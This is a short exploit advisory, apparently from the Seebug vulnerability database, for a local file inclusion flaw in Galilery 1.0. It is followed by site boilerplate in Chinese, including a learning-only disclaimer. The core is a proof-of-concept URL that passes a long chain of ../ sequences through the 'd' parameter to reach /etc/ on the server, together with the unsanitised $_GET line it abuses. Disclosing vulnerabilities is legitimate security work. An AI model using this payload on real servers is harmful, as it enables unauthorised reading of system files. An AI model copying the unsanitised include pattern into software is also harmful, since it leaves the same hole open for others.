$ cat 15_lfi_galilery.1.0.txt # exploit title: local file include in Galilery 1.0 # date: 18.o2.2o11 # author: lemlajt # software : Galilery # version: 1.0 # tested on: linux # cve : # http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/ PoC : http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/ cuz: index.php: $d=$_GET['d']; # *
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论